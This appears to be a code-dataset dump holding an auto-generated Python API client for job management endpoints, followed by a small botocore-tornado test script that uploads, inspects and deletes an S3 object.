collection_formats=collection_formats, _request_auth=local_var_params.get('_request_auth')) def job_cancel(self, id, data, **kwargs): # noqa: E501 """job_cancel # noqa: E501 Cancel a job # noqa: E501 This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please pass async_req=True >>> thread = api.job_cancel(id, data, async_req=True) >>> result = thread.get() :param id: (required) :type id: str :param data: (required) :type data: object :param async_req: Whether to execute the request asynchronously. :type async_req: bool, optional :param _preload_content: if False, the urllib3.HTTPResponse object will be returned without reading/decoding response data. Default is True. :type _preload_content: bool, optional :param _request_timeout: timeout setting for this request. If one number provided, it will be total request timeout. It can also be a pair (tuple) of (connection, read) timeouts. :return: Returns the result object. If the method is called asynchronously, returns the request thread. :rtype: None """ kwargs['_return_http_data_only'] = True return self.job_cancel_with_http_info(id, data, **kwargs) # noqa: E501 def job_cancel_with_http_info(self, id, data, **kwargs): # noqa: E501 """job_cancel # noqa: E501 Cancel a job # noqa: E501 This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please pass async_req=True >>> thread = api.job_cancel_with_http_info(id, data, async_req=True) >>> result = thread.get() :param id: (required) :type id: str :param data: (required) :type data: object :param async_req: Whether to execute the request asynchronously. :type async_req: bool, optional :param _return_http_data_only: response data without head status code and headers :type _return_http_data_only: bool, optional :param _preload_content: if False, the urllib3.HTTPResponse object will be returned without reading/decoding response data. Default is True. :type _preload_content: bool, optional :param _request_timeout: timeout setting for this request. If one number provided, it will be total request timeout. It can also be a pair (tuple) of (connection, read) timeouts. :param _request_auth: set to override the auth_settings for an a single request; this effectively ignores the authentication in the spec for a single request. :type _request_auth: dict, optional :return: Returns the result object. If the method is called asynchronously, returns the request thread. :rtype: None """ local_var_params = locals() all_params = [ 'id', 'data' ] all_params.extend( [ 'async_req', '_return_http_data_only', '_preload_content', '_request_timeout', '_request_auth' ] ) for key, val in six.iteritems(local_var_params['kwargs']): if key not in all_params: raise ApiTypeError( "Got an unexpected keyword argument '%s'" " to method job_cancel" % key ) local_var_params[key] = val del local_var_params['kwargs'] # verify the required parameter 'id' is set if self.api_client.client_side_validation and ('id' not in local_var_params or # noqa: E501 local_var_params['id'] is None): # noqa: E501 raise ApiValueError("Missing the required parameter `id` when calling `job_cancel`") # noqa: E501 # verify the required parameter 'data' is set if self.api_client.client_side_validation and ('data' not in local_var_params or # noqa: E501 local_var_params['data'] is None): # noqa: E501 raise ApiValueError("Missing the required parameter `data` when calling `job_cancel`") # noqa: E501 collection_formats = {} path_params = {} if 'id' in local_var_params: path_params['id'] = local_var_params['id'] # noqa: E501 query_params = [] header_params = {} form_params = [] local_var_files = {} body_params = None if 'data' in local_var_params: body_params = local_var_params['data'] # HTTP header `Content-Type` header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501 ['application/json']) # noqa: E501 # Authentication setting auth_settings = ['Bearer'] # noqa: E501 return self.api_client.call_api( '/job/{id}/cancel/', 'POST', path_params, query_params, header_params, body=body_params, post_params=form_params, files=local_var_files, response_type=None, # noqa: E501 auth_settings=auth_settings, async_req=local_var_params.get('async_req'), _return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501 _preload_content=local_var_params.get('_preload_content', True), _request_timeout=local_var_params.get('_request_timeout'), collection_formats=collection_formats, _request_auth=local_var_params.get('_request_auth')) def job_create(self, data, **kwargs): # noqa: E501 """job_create # noqa: E501 Create a new job bssased on the submitted job specification. App and Queue codes can be retreived from the catalog endpoints. # noqa: E501 This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please pass async_req=True >>> thread = api.job_create(data, async_req=True) >>> result = thread.get() :param data: (required) :type data: JobArraySpec :param async_req: Whether to execute the request asynchronously. :type async_req: bool, optional :param _preload_content: if False, the urllib3.HTTPResponse object will be returned without reading/decoding response data. Default is True. :type _preload_content: bool, optional :param _request_timeout: timeout setting for this request. If one number provided, it will be total request timeout. It can also be a pair (tuple) of (connection, read) timeouts. :return: Returns the result object. If the method is called asynchronously, returns the request thread. :rtype: list[Job] """ kwargs['_return_http_data_only'] = True return self.job_create_with_http_info(data, **kwargs) # noqa: E501 def job_create_with_http_info(self, data, **kwargs): # noqa: E501 """job_create # noqa: E501 Create a new job bssased on the submitted job specification. App and Queue codes can be retreived from the catalog endpoints. # noqa: E501 This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please pass async_req=True >>> thread = api.job_create_with_http_info(data, async_req=True) >>> result = thread.get() :param data: (required) :type data: JobArraySpec :param async_req: Whether to execute the request asynchronously. :type async_req: bool, optional :param _return_http_data_only: response data without head status code and headers :type _return_http_data_only: bool, optional :param _preload_content: if False, the urllib3.HTTPResponse object will be returned without reading/decoding response data. Default is True. :type _preload_content: bool, optional :param _request_timeout: timeout setting for this request. If one number provided, it will be total request timeout. It can also be a pair (tuple) of (connection, read) timeouts. :param _request_auth: set to override the auth_settings for an a single request; this effectively ignores the authentication in the spec for a single request. :type _request_auth: dict, optional :return: Returns the result object. If the method is called asynchronously, returns the request thread. :rtype: tuple(list[Job], status_code(int), headers(HTTPHeaderDict)) """ local_var_params = locals() all_params = [ 'data' ] all_params.extend( [ 'async_req', '_return_http_data_only', '_preload_content', '_request_timeout', '_request_auth' ] ) for key, val in six.iteritems(local_var_params['kwargs']): if key not in all_params: raise ApiTypeError( "Got an unexpected keyword argument '%s'" " to method job_create" % key ) local_var_params[key] = val del local_var_params['kwargs'] # verify the required parameter 'data' is set if self.api_client.client_side_validation and ('data' not in local_var_params or # noqa: E501 local_var_params['data'] is None): # noqa: E501 raise ApiValueError("Missing the required parameter `data` when calling `job_create`") # noqa: E501 collection_formats = {} path_params = {} query_params = [] header_params = {} form_params = [] local_var_files = {} body_params = None if 'data' in local_var_params: body_params = local_var_params['data'] # HTTP header `Accept` header_params['Accept'] = self.api_client.select_header_accept( ['application/json']) # noqa: E501 # HTTP header `Content-Type` header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501 ['application/json']) # noqa: E501 # Authentication setting auth_settings = ['Bearer'] # noqa: E501 return self.api_client.call_api( '/job/', 'POST', path_params, query_params, header_params, body=body_params, post_params=form_params, files=local_var_files, response_type='list[Job]', # noqa: E501 auth_settings=auth_settings, async_req=local_var_params.get('async_req'), _return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501 _preload_content=local_var_params.get('_preload_content', True), _request_timeout=local_var_params.get('_request_timeout'), collection_formats=collection_formats, _request_auth=local_var_params.get('_request_auth')) def job_list(self, **kwargs): # noqa: E501 """job_list # noqa: E501 List the jobs instances in EPIC # noqa: E501 This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please pass async_req=True >>> thread = api.job_list(async_req=True) >>> result = thread.get() :param limit: Number of results to return per page. :type limit: int :param offset: The initial index from which to return the results. :type offset: int :param async_req: Whether to execute the request asynchronously. :type async_req: bool, optional :param _preload_content: if False, the urllib3.HTTPResponse object will be returned without reading/decoding response data. Default is True. :type _preload_content: bool, optional :param _request_timeout: timeout setting for this request. If one number provided, it will be total request timeout. It can also be a pair (tuple) of (connection, read) timeouts. :return: Returns the result object. If the method is called asynchronously, returns the request thread. :rtype: InlineResponse2006 """ kwargs['_return_http_data_only'] = True return self.job_list_with_http_info(**kwargs) # noqa: E501 def job_list_with_http_info(self, **kwargs): # noqa: E501 """job_list # noqa: E501 List the jobs instances in EPIC # noqa: E501 This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please pass async_req=True >>> thread = api.job_list_with_http_info(async_req=True) >>> result = thread.get() :param limit: Number of results to return per page. :type limit: int :param offset: The initial index from which to return the results. :type offset: int :param async_req: Whether to execute the request asynchronously. :type async_req: bool, optional :param _return_http_data_only: response data without head status code and headers :type _return_http_data_only: bool, optional :param _preload_content: if False, the urllib3.HTTPResponse object will be returned without reading/decoding response data. Default is True. :type _preload_content: bool, optional :param _request_timeout: timeout setting for this request. If one number provided, it will be total request timeout. It can also be a pair (tuple) of (connection, read) timeouts. :param _request_auth: set to override the auth_settings for an a single request; this effectively ignores the authentication in the spec for a single request. :type _request_auth: dict, optional :return: Returns the result object. If the method is called asynchronously, returns the request thread. :rtype: tuple(InlineResponse2006, status_code(int), headers(HTTPHeaderDict)) """ local_var_params = locals() all_params = [ 'limit', 'offset' ] all_params.extend( [ 'async_req', '_return_http_data_only', '_preload_content', '_request_timeout', '_request_auth' ] ) for key, val in six.iteritems(local_var_params['kwargs']): if key not in all_params: raise ApiTypeError( "Got an unexpected keyword argument '%s'" " to method job_list" % key ) local_var_params[key] = val del local_var_params['kwargs'] collection_formats = {} path_params = {} query_params = [] if 'limit' in local_var_params and local_var_params['limit'] is not None: # noqa: E501 query_params.append(('limit', local_var_params['limit'])) # noqa: E501 if 'offset' in local_var_params and local_var_params['offset'] is not None: # noqa: E501 query_params.append(('offset', local_var_params['offset'])) # noqa: E501 header_params = {} form_params = [] local_var_files = {} body_params = None # HTTP header `Accept` header_params['Accept'] = self.api_client.select_header_accept( ['application/json']) # noqa: E501 # Authentication setting auth_settings = ['Bearer'] # noqa: E501 return self.api_client.call_api( '/job/', 'GET', path_params, query_params, header_params, body=body_params, post_params=form_params, files=local_var_files, response_type='InlineResponse2006', # noqa: E501 auth_settings=auth_settings, async_req=local_var_params.get('async_req'), _return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501 _preload_content=local_var_params.get('_preload_content', True), _request_timeout=local_var_params.get('_request_timeout'), collection_formats=collection_formats, _request_auth=local_var_params.get('_request_auth')) def job_partial_update(self, id, data, **kwargs): # noqa: E501 """job_partial_update # noqa: E501 Update the job options for job instance with ID {id} # noqa: E501 This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please pass async_req=True >>> thread = api.job_partial_update(id, data, async_req=True) >>> result = thread.get() :param id: (required) :type id: str :param data: (required) :type data: JobAppOptions :param async_req: Whether to execute the request asynchronously. :type async_req: bool, optional :param _preload_content: if False, the urllib3.HTTPResponse object will be returned without reading/decoding response data. Default is True. :type _preload_content: bool, optional :param _request_timeout: timeout setting for this request. If one number provided, it will be total request timeout. It can also be a pair (tuple) of (connection, read) timeouts. :return: Returns the result object. If the method is called asynchronously, returns the request thread. :rtype: JobAppOptions """ kwargs['_return_http_data_only'] = True return self.job_partial_update_with_http_info(id, data, **kwargs) # noqa: E501 def job_partial_update_with_http_info(self, id, data, **kwargs): # noqa: E501 """job_partial_update # noqa: E501 Update the job options for job instance with ID {id} # noqa: E501 This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please pass async_req=True >>> thread = api.job_partial_update_with_http_info(id, data, async_req=True) >>> result = thread.get() :param id: (required) :type id: str :param data: (required) :type data: JobAppOptions :param async_req: Whether to execute the request asynchronously. :type async_req: bool, optional :param _return_http_data_only: response data without head status code and headers :type _return_http_data_only: bool, optional :param _preload_content: if False, the urllib3.HTTPResponse object will be returned without reading/decoding response data. Default is True. :type _preload_content: bool, optional :param _request_timeout: timeout setting for this request. If one number provided, it will be total request timeout. It can also be a pair (tuple) of (connection, read) timeouts. :param _request_auth: set to override the auth_settings for an a single request; this effectively ignores the authentication in the spec for a single request. :type _request_auth: dict, optional :return: Returns the result object. If the method is called asynchronously, returns the request thread. :rtype: tuple(JobAppOptions, status_code(int), headers(HTTPHeaderDict)) """ local_var_params = locals() all_params = [ 'id', 'data' ] all_params.extend( [ 'async_req', '_return_http_data_only', '_preload_content', '_request_timeout', '_request_auth' ] ) for key, val in six.iteritems(local_var_params['kwargs']): if key not in all_params: raise ApiTypeError( "Got an unexpected keyword argument '%s'" " to method job_partial_update" % key ) local_var_params[key] = val del local_var_params['kwargs'] # verify the required parameter 'id' is set if self.api_client.client_side_validation and ('id' not in local_var_params or # noqa: E501 local_var_params['id'] is None): # noqa: E501 raise ApiValueError("Missing the required parameter `id` when calling `job_partial_update`") # noqa: E501 # verify the required parameter 'data' is set if self.api_client.client_side_validation and ('data' not in local_var_params or # noqa: E501 local_var_params['data'] is None): # noqa: E501 raise ApiValueError("Missing the required parameter `data` when calling `job_partial_update`") # noqa: E501 collection_formats = {} path_params = {} if 'id' in local_var_params: path_params['id'] = local_var_params['id'] # noqa: E501 query_params = [] header_params = {} form_params = [] local_var_files = {} body_params = None if 'data' in local_var_params: body_params = local_var_params['data'] # HTTP header `Accept` header_params['Accept'] = self.api_client.select_header_accept( ['application/json']) # noqa: E501 # HTTP header `Content-Type` header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501 ['application/json']) # noqa: E501 # Authentication setting auth_settings = ['Bearer'] # noqa: E501 return self.api_client.call_api( '/job/{id}/', 'PATCH', path_params, query_params, header_params, body=body_params, post_params=form_params, files=local_var_files, response_type='JobAppOptions', # noqa: E501 auth_settings=auth_settings, async_req=local_var_params.get('async_req'), _return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501 _preload_content=local_var_params.get('_preload_content', True), _request_timeout=local_var_params.get('_request_timeout'), collection_formats=collection_formats, _request_auth=local_var_params.get('_request_auth')) def job_quote(self, data, **kwargs): # noqa: E501 """job_quote # noqa: E501 Provides a price quote based upon the given BatchJobLaunchSpec. Quotes will be returned for clusters that the user/team has permission to use and that support the requested application, task distribution and runtime. When submitting multiple steps in a the job specification then the task reference may be used to identify individual steps. # noqa: E501 This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please pass async_req=True >>> thread = api.job_quote(data, async_req=True) >>> result = thread.get() :param data: (required) :type data: JobSpec :param async_req: Whether to execute the request asynchronously. :type async_req: bool, optional :param _preload_content: if False, the urllib3.HTTPResponse object will be returned without reading/decoding response data. Default is True. :type _preload_content: bool, optional :param _request_timeout: timeout setting for this request. If one number provided, it will be total request timeout. It can also be a pair (tuple) of (connection, read) timeouts. :return: Returns the result object. If the method is called asynchronously, returns the request thread. :rtype: JobQuote """ kwargs['_return_http_data_only'] = True return self.job_quote_with_http_info(data, **kwargs) # noqa: E501 def job_quote_with_http_info(self, data, **kwargs): # noqa: E501 """job_quote # noqa: E501 Provides a price quote based upon the given BatchJobLaunchSpec. Quotes will be returned for clusters that the user/team has permission to use and that support the requested application, task distribution and runtime. When submitting multiple steps in a the job specification then the task reference may be used to identify individual steps. # noqa: E501 This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please pass async_req=True >>> thread = api.job_quote_with_http_info(data, async_req=True) >>> result = thread.get() :param data: (required) :type data: JobSpec :param async_req: Whether to execute the request asynchronously. :type async_req: bool, optional :param _return_http_data_only: response data without head status code and headers :type _return_http_data_only: bool, optional :param _preload_content: if False, the urllib3.HTTPResponse object will be returned without reading/decoding response data. Default is True. :type _preload_content: bool, optional :param _request_timeout: timeout setting for this request. If one number provided, it will be total request timeout. It can also be a pair (tuple) of (connection, read) timeouts. :param _request_auth: set to override the auth_settings for an a single request; this effectively ignores the authentication in the spec for a single request. :type _request_auth: dict, optional :return: Returns the result object. If the method is called asynchronously, returns the request thread. :rtype: tuple(JobQuote, status_code(int), headers(HTTPHeaderDict)) """ local_var_params = locals() all_params = [ 'data' ] all_params.extend( [ 'async_req', '_return_http_data_only', '_preload_content', '_request_timeout', '_request_auth' ] ) for key, val in six.iteritems(local_var_params['kwargs']): if key not in all_params: raise ApiTypeError( "Got an unexpected keyword argument '%s'" " to method job_quote" % key ) local_var_params[key] = val del local_var_params['kwargs'] # verify the required parameter 'data' is set if self.api_client.client_side_validation and ('data' not in local_var_params or # noqa: E501 local_var_params['data'] is None): # noqa: E501 raise ApiValueError("Missing the required parameter `data` when calling `job_quote`") # noqa: E501 collection_formats = {} path_params = {} query_params = [] header_params = {} form_params = [] local_var_files = {} body_params = None if 'data' in local_var_params: body_params = local_var_params['data'] # HTTP header `Accept` header_params['Accept'] = self.api_client.select_header_accept( ['application/json']) # noqa: E501 # HTTP header `Content-Type` header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501 ['application/json']) # noqa: E501 # Authentication setting auth_settings = ['Bearer'] # noqa: E501 return self.api_client.call_api( '/job/quote/', 'POST', path_params, query_params, header_params, body=body_params, post_params=form_params, files=local_var_files, response_type='JobQuote', # noqa: E501 auth_settings=auth_settings, async_req=local_var_params.get('async_req'), _return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501 _preload_content=local_var_params.get('_preload_content', True), _request_timeout=local_var_params.get('_request_timeout'), collection_formats=collection_formats, _request_auth=local_var_params.get('_request_auth')) def job_read(self, id, **kwargs): # noqa: E501 """job_read # noqa: E501 See the details for the job instance with ID {id} # noqa: E501 This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please pass async_req=True >>> thread = api.job_read(id, async_req=True) >>> result = thread.get() :param id: (required) :type id: str :param async_req: Whether to execute the request asynchronously. :type async_req: bool, optional :param _preload_content: if False, the urllib3.HTTPResponse object will be returned without reading/decoding response data. Default is True. :type _preload_content: bool, optional :param _request_timeout: timeout setting for this request. If one number provided, it will be total request timeout. It can also be a pair (tuple) of (connection, read) timeouts. :return: Returns the result object. If the method is called asynchronously, returns the request thread. :rtype: Job """ kwargs['_return_http_data_only'] = True return self.job_read_with_http_info(id, **kwargs) # noqa: E501 def job_read_with_http_info(self, id, **kwargs): # noqa: E501 """job_read # noqa: E501 See the details for the job instance with ID {id} # noqa: E501 This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please pass async_req=True >>> thread = api.job_read_with_http_info(id, async_req=True) >>> result = thread.get() :param id: (required) :type id: str :param async_req: Whether to execute the request asynchronously. :type async_req: bool, optional :param _return_http_data_only: response data without head status code and headers :type _return_http_data_only: bool, optional :param _preload_content: if False, the urllib3.HTTPResponse object will be returned without reading/decoding response data. Default is True. :type _preload_content: bool, optional :param _request_timeout: timeout setting for this request. If one number provided, it will be total request timeout. It can also be a pair (tuple) of (connection, read) timeouts. :param _request_auth: set to override the auth_settings for an a single request; this effectively ignores the authentication in the spec for a single request. :type _request_auth: dict, optional :return: Returns the result object. If the method is called asynchronously, returns the request thread. :rtype: tuple(Job, status_code(int), headers(HTTPHeaderDict)) """ local_var_params = locals() all_params = [ 'id' ] all_params.extend( [ 'async_req', '_return_http_data_only', '_preload_content', '_request_timeout', '_request_auth' ] ) for key, val in six.iteritems(local_var_params['kwargs']): if key not in all_params: raise ApiTypeError( "Got an unexpected keyword argument '%s'" " to method job_read" % key ) local_var_params[key] = val del local_var_params['kwargs'] # verify the required parameter 'id' is set if self.api_client.client_side_validation and ('id' not in local_var_params or # noqa: E501 local_var_params['id'] is None): # noqa: E501 raise ApiValueError("Missing the required parameter `id` when calling `job_read`") # noqa: E501 collection_formats = {} path_params = {} if 'id' in local_var_params: path_params['id'] = local_var_params['id'] # noqa: E501 query_params = [] header_params = {} form_params = [] local_var_files = {} body_params = None # HTTP header `Accept` header_params['Accept'] = self.api_client.select_header_accept( ['application/json']) # noqa: E501 # Authentication setting auth_settings = ['Bearer'] # noqa: E501 return self.api_client.call_api( '/job/{id}/', 'GET', path_params, query_params, header_params, body=body_params, post_params=form_params, files=local_var_files, response_type='Job', # noqa: E501 auth_settings=auth_settings, async_req=local_var_params.get('async_req'), _return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501 _preload_content=local_var_params.get('_preload_content', True), _request_timeout=local_var_params.get('_request_timeout'), collection_formats=collection_formats, _request_auth=local_var_params.get('_request_auth')) def job_residuals_read(self, id, **kwargs): # noqa: E501 """job_residuals_read # noqa: E501 Retreive the residuals for job with ID {id} # noqa: E501 This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please pass async_req=True >>> thread = api.job_residuals_read(id, async_req=True) >>> result = thread.get() :param id: A unique integer value identifying this batch job instance. (required) :type id: int :param variables: Return data values for these variable names :type variables: list[str] :param async_req: Whether to execute the request asynchronously. :type async_req: bool, optional :param _preload_content: if False, the urllib3.HTTPResponse object will be returned without reading/decoding response data. Default is True. :type _preload_content: bool, optional :param _request_timeout: timeout setting for this request. If one number provided, it will be total request timeout. It can also be a pair (tuple) of (connection, read) timeouts. :return: Returns the result object. If the method is called asynchronously, returns the request thread. :rtype: JobResidual """ kwargs['_return_http_data_only'] = True return self.job_residuals_read_with_http_info(id, **kwargs) # noqa: E501 def job_residuals_read_with_http_info(self, id, **kwargs): # noqa: E501 """job_residuals_read # noqa: E501 Retreive the residuals for job with ID {id} # noqa: E501 This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please pass async_req=True >>> thread = api.job_residuals_read_with_http_info(id, async_req=True) >>> result = thread.get() :param id: A unique integer value identifying this batch job instance. (required) :type id: int :param variables: Return data values for these variable names :type variables: list[str] :param async_req: Whether to execute the request asynchronously. :type async_req: bool, optional :param _return_http_data_only: response data without head status code and headers :type _return_http_data_only: bool, optional :param _preload_content: if False, the urllib3.HTTPResponse object will be returned without reading/decoding response data. Default is True. :type _preload_content: bool, optional :param _request_timeout: timeout setting for this request. If one number provided, it will be total request timeout. It can also be a pair (tuple) of (connection, read) timeouts. :param _request_auth: set to override the auth_settings for an a single request; this effectively ignores the authentication in the spec for a single request. :type _request_auth: dict, optional :return: Returns the result object. If the method is called asynchronously, returns the request thread. :rtype: tuple(JobResidual, status_code(int), headers(HTTPHeaderDict)) """ local_var_params = locals() all_params = [ 'id', 'variables' ] all_params.extend( [ 'async_req', '_return_http_data_only', '_preload_content', '_request_timeout', '_request_auth' ] ) for key, val in six.iteritems(local_var_params['kwargs']): if key not in all_params: raise ApiTypeError( "Got an unexpected keyword argument '%s'" " to method job_residuals_read" % key ) local_var_params[key] = val del local_var_params['kwargs'] # verify the required parameter 'id' is set if self.api_client.client_side_validation and ('id' not in local_var_params or # noqa: E501 local_var_params['id'] is None): # noqa: E501 raise ApiValueError("Missing the required parameter `id` when calling `job_residuals_read`") # noqa: E501 collection_formats = {} path_params = {} if 'id' in local_var_params: path_params['id'] = local_var_params['id'] # noqa: E501 query_params = [] if 'variables' in local_var_params and local_var_params['variables'] is not None: # noqa: E501 query_params.append(('variables', local_var_params['variables'])) # noqa: E501 collection_formats['variables'] = 'csv' # noqa: E501 header_params = {} form_params = [] local_var_files = {} body_params = None # HTTP header `Accept` header_params['Accept'] = self.api_client.select_header_accept( ['application/json']) # noqa: E501 # Authentication setting auth_settings = ['Bearer'] # noqa: E501 return self.api_client.call_api( '/job/{id}/residuals/', 'GET', path_params, query_params, header_params, body=body_params, post_params=form_params, files=local_var_files, response_type='JobResidual', # noqa: E501 auth_settings=auth_settings, async_req=local_var_params.get('async_req'), _return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501 _preload_content=local_var_params.get('_preload_content', True), _request_timeout=local_var_params.get('_request_timeout'), collection_formats=collection_formats, _request_auth=local_var_params.get('_request_auth'))
43.504695
362
0.582421
6,215
55,599
4.973612
0.043604
0.040115
0.06069
0.031445
0.963961
0.961049
0.9583
0.956844
0.949727
0.939989
0
0.013871
0.345168
55,599
1,277
363
43.538763
0.835146
0.492491
0
0.760512
0
0
0.159073
0.024671
0
0
0
0
0
1
0.034735
false
0
0.009141
0
0.078611
0
0
0
0
null
0
0
0
1
1
1
1
1
1
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
7
c37ffdee531e1ec54923ad65f40a2a035de352e1
361
py
Python
tests/internal/virtualization/test_virtualization_hvm_auto.py
frolovv/aws.ec2.compare
582805823492f833d65c0441c4a14dce697c12aa
[ "Apache-2.0" ]
null
null
null
tests/internal/virtualization/test_virtualization_hvm_auto.py
frolovv/aws.ec2.compare
582805823492f833d65c0441c4a14dce697c12aa
[ "Apache-2.0" ]
null
null
null
tests/internal/virtualization/test_virtualization_hvm_auto.py
frolovv/aws.ec2.compare
582805823492f833d65c0441c4a14dce697c12aa
[ "Apache-2.0" ]
null
null
null
# Testing module virtualization.hvm import pytest import ec2_compare.internal.virtualization.hvm def test_get_internal_data_virtualization_hvm_get_instances_list(): assert len(ec2_compare.internal.virtualization.hvm.get_instances_list()) > 0 def test_get_internal_data_virtualization_hvm_get(): assert len(ec2_compare.internal.virtualization.hvm.get) > 0
36.1
78
0.853186
50
361
5.78
0.36
0.352941
0.276817
0.33218
0.82699
0.615917
0.615917
0.615917
0
0
0
0.014925
0.072022
361
9
79
40.111111
0.847761
0.091413
0
0
0
0
0
0
0
0
0
0
0.333333
1
0.333333
true
0
0.333333
0
0.666667
0
0
0
0
null
1
1
1
1
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
1
1
0
1
0
1
0
0
9
6f13fb036aac286606bee5210004bb045b921583
2,242
py
Python
main/migrations/0004_auto_20201119_2103.py
vestial/vision-video-analyzer
f5c5f9c0f0522008e86641648fd1591507ca8f6b
[ "MIT" ]
1
2020-10-30T00:49:21.000Z
2020-10-30T00:49:21.000Z
main/migrations/0004_auto_20201119_2103.py
vestial/vision-video-analyzer
f5c5f9c0f0522008e86641648fd1591507ca8f6b
[ "MIT" ]
null
null
null
main/migrations/0004_auto_20201119_2103.py
vestial/vision-video-analyzer
f5c5f9c0f0522008e86641648fd1591507ca8f6b
[ "MIT" ]
null
null
null
# Generated by Django 3.1.2 on 2020-11-19 21:03 from django.db import migrations, models class Migration(migrations.Migration): dependencies = [ ('main', '0003_auto_20201119_2033'), ] operations = [ migrations.AddField( model_name='video', name='bit_depth_recommendation', field=models.TextField(blank=True, default='No recommendation available.', null=True), ), migrations.AddField( model_name='video', name='bit_rate_recommendation', field=models.TextField(blank=True, default='No recommendation available.', null=True), ), migrations.AddField( model_name='video', name='frame_rate_recommendation', field=models.TextField(blank=True, default='No recommendation available.', null=True), ), migrations.AddField( model_name='video', name='resolution_recommendation', field=models.TextField(blank=True, default='No recommendation available.', null=True), ), migrations.AddField( model_name='video', name='sample_rate_recommendation', field=models.TextField(blank=True, default='No recommendation available.', null=True), ), migrations.AddField( model_name='video', name='shutter_speed_recommendation', field=models.TextField(blank=True, default='No recommendation available.', null=True), ), migrations.AddField( model_name='video', name='video_length_recommendation', field=models.TextField(blank=True, default='No recommendation available.', null=True), ), ]
35.587302
74
0.477252
168
2,242
6.232143
0.285714
0.068768
0.153773
0.180516
0.812798
0.812798
0.812798
0.772684
0.772684
0.772684
0
0.02439
0.433095
2,242
62
75
36.16129
0.799371
0.020071
0
0.75
1
0
0.198633
0.091572
0
0
0
0
0
1
0
false
0
0.017857
0
0.071429
0
0
0
0
null
0
0
1
1
1
1
1
1
1
0
0
0
0
0
0
0
0
0
0
1
1
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
9
6f20ba6ab90d7e54c6e8178db55cde079d25f9a9
4,643
py
Python
test.py
ezotrank/botocore-tornado
ec3110830494c52cde923934c02ccb2ff37d6a83
[ "MIT" ]
null
null
null
test.py
ezotrank/botocore-tornado
ec3110830494c52cde923934c02ccb2ff37d6a83
[ "MIT" ]
null
null
null
test.py
ezotrank/botocore-tornado
ec3110830494c52cde923934c02ccb2ff37d6a83
[ "MIT" ]
1
2021-11-03T10:46:54.000Z
2021-11-03T10:46:54.000Z
import botocore_tornado.session import botocore.session from tornado import gen from tornado.ioloop import IOLoop bucket = 'botocore-tornado-test' # change this to your bucket name key = 'xyzzy' # a subfolder under the bucket filename = 'testfile.txt' # the file we will put into S3 region = 'us-east-1' # change this to your region acl = 'public-read' # we are going to set the ACL to public-read so we can access the file via a url @gen.coroutine def main_async(): session = botocore_tornado.session.get_session() session.set_debug_logger() session.set_debug_logger('botocore_tornado') s3 = session.get_service('s3') endpoint = s3.get_endpoint(region) print "=========================" print "====== ASYNC TEST =======" print "=========================" print print "uploading the file to s3" fp = open('./' + filename, 'rb') operation = s3.get_operation('PutObject') http_response, response_data = yield operation.call(endpoint, bucket=bucket, key=key + '/' + filename, body=fp) print http_response print response_data print print "getting s3 object properties of file we just uploaded" operation = s3.get_operation('GetObjectAcl') http_response, response_data = yield operation.call(endpoint, bucket=bucket, key=key + '/' + filename) print http_response print response_data print print "setting the acl to public-read" operation = s3.get_operation('PutObjectAcl') http_response, response_data = yield operation.call(endpoint, bucket=bucket, key=key + '/' + filename, acl=acl) print http_response print response_data print print "The url of the object is:" print print 'http://'+bucket+'.s3.amazonaws.com/' + key + '/' + filename operation = s3.get_operation('DeleteObject') http_response, response_data = yield operation.call(endpoint, bucket=bucket, key=key + '/' + filename) print http_response print response_data def main_sync(): session = botocore.session.get_session() session.set_debug_logger() s3 = session.get_service('s3') endpoint = s3.get_endpoint(region) print "=========================" print "====== SYNC TEST ========" print "=========================" print print "uploading the file to s3" fp = open('./' + filename, 'rb') operation = s3.get_operation('PutObject') http_response, response_data = operation.call(endpoint, bucket=bucket, key=key + '/' + filename, body=fp) print http_response print response_data print print "getting s3 object properties of file we just uploaded" operation = s3.get_operation('GetObjectAcl') http_response, response_data = operation.call(endpoint, bucket=bucket, key=key + '/' + filename) print http_response print response_data print print "setting the acl to public-read" operation = s3.get_operation('PutObjectAcl') http_response, response_data = operation.call(endpoint, bucket=bucket, key=key + '/' + filename, acl=acl) print http_response print response_data print print "The url of the object is:" print print 'http://'+bucket+'.s3.amazonaws.com/' + key + '/' + filename operation = s3.get_operation('DeleteObject') http_response, response_data = operation.call(endpoint, bucket=bucket, key=key + '/' + filename) print http_response print response_data if __name__ == '__main__': with open(filename, 'w') as f: f.write("botocore tornado upload test file") IOLoop.instance().run_sync(main_async) main_sync()
38.691667
101
0.518199
451
4,643
5.184035
0.197339
0.082121
0.047904
0.0787
0.772455
0.764756
0.764756
0.73225
0.73225
0.73225
0
0.007597
0.376265
4,643
119
102
39.016807
0.799724
0.041999
0
0.792453
0
0
0.155786
0.02724
0
0
0
0
0
0
null
null
0
0.037736
null
null
0.396226
0
0
0
null
0
0
0
0
1
1
1
1
1
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
null
0
0
0
0
1
0
0
0
0
0
0
0
0
7
6f3b642010b53076efeab783795f90c90092c5bf
284
py
Python
